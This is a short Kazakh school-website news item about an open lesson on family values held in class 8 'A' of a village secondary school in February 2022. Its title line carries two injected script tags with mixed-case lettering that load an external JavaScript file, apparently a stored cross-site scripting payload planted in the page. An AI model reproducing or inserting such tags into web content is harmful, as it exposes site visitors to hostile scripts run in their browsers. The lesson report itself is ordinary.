«Өзін-өзі тану» пәні онкүндігіне орай Мухатай Темірбек 8 «А» сыныбында «Отбасы қадірі» атты ашық сабақ өткізді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.02.2022

2022 жылы 25 ақпан күні Жаңатұрмыс ауылының жалпы орта мектебінде «Өзін-өзі тану» пәні онкүндігіне орай Мухатай Темірбек 8 «А» сыныбында  «Отбасы қадірі» атты ашық сабақ өткізді. Сабақ барысында оқушылар отбасы туралы видеоны тамашалап, «Дәйексөзді» хормен қайталап айтты. Оралхан Бөкейдің «Қайдасың, қасқа құлыным!» атты үзіндіні оқып, сұрақтарға жауап берді. «Әкеме ерсем,адам боламын» атты мәлімдемеге өз пікірлерін білдірді. Сабақты қорытындылау барысында оқушылар мұғаліммен бірге «Ана мен сәби » өлеңін айтты. Оқушылар сабаққа белсене қатысты. 

 

Просмотров: 287


Пікір қосу



Деректерді қолтаңбаға қосу